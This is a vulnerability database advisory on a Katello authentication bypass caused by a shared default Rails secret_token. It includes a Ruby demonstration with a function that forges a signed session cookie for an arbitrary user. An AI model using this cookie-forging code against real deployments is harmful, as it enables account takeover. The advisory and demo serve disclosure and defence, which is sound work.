Veracode Vulnerability Database: VERACODE:11042
History: Jan 15, 2019 - 8:56 a.m.

Authentication Bypass

2019-01-15 08:56:05
Veracode Vulnerability Database
sca.analysiscenter.veracode.com
5

EPSS: 0.015 (Low)

EPSS Percentile: 87.1%

Katello is vulnerable to an authentication bypass. The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, so every default installation ends up with the same secret token. Because Rails signs its session cookies with that token, a remote attacker who knows the shared default can mint a session cookie for any user and authenticate to the CloudForms System Engine web interface as an arbitrary user. Remediation is to generate a unique, random secret_token for each installation; doing so also invalidates every session cookie signed with the old value.
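The following is an added illustration, not code from the advisory or from the Katello project. It reproduces the Rails 3 CookieStore signing scheme (Base64 of a Marshal dump, followed by "--" and an HMAC-SHA1 over that Base64 under secret_token) and shows why a shared default token is fatal: a cookie forged with the default verifies on every install that kept it, and is rejected once the install has its own random token. The DEFAULT_SECRET_TOKEN value and the user id 1 are placeholders chosen for the demo; the real default value is not reproduced here.

```ruby
require "base64"
require "openssl"
require "securerandom"

# Rails 3 CookieStore / ActiveSupport::MessageVerifier format:
#   cookie = Base64(Marshal.dump(session)) + "--" + HMAC-SHA1(secret_token, Base64 part)
# Whoever knows secret_token can produce a cookie for any session contents.

# Hypothetical stand-in for the token every default install shared.
DEFAULT_SECRET_TOKEN = "hypothetical-shared-default-secret_token".freeze

def sign_session(secret, session)
  data = Base64.strict_encode64(Marshal.dump(session))
  digest = OpenSSL::HMAC.hexdigest("SHA1", secret, data)
  "#{data}--#{digest}"
end

# Constant-time string comparison so the HMAC check does not leak timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the session hash if the cookie was signed under `secret`, else nil.
# Marshal.load runs only after the HMAC verifies: deserializing attacker
# bytes is itself dangerous, so the signature is the only thing standing
# between a forged cookie and the application.
def verify_session(secret, cookie)
  data, digest = cookie.to_s.split("--", 2)
  return nil if data.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest("SHA1", secret, data)
  return nil unless secure_equal?(digest, expected)
  Marshal.load(Base64.strict_decode64(data))
rescue ArgumentError, TypeError
  nil
end

# Attacker side: mint a session claiming an arbitrary user (hypothetical id 1).
def forge_cookie(secret, user_id = 1)
  sign_session(secret, { "session_id" => SecureRandom.hex(16), "user_id" => user_id })
end

# What the installer should have produced: a per-install random token.
def fresh_secret_token
  SecureRandom.hex(64)
end

# Same forged cookie presented to a default install and to a fixed install.
def demo
  forged = forge_cookie(DEFAULT_SECRET_TOKEN)
  on_default = verify_session(DEFAULT_SECRET_TOKEN, forged)
  on_fixed   = verify_session(fresh_secret_token, forged)
  {
    default_install_accepts: !on_default.nil?,
    fixed_install_accepts:   !on_fixed.nil?,
    user_id_as_seen_by_default_install: on_default && on_default["user_id"]
  }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

The defence is entirely in the secret: the format, the digest and the verifier code are identical on the vulnerable and the fixed install, and the same forged cookie is accepted by one and rejected by the other purely because the fixed install's secret_token is unknown to the attacker. Any Rails deployment can be checked the same way: if two independent installs accept each other's session cookies, they share a secret.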
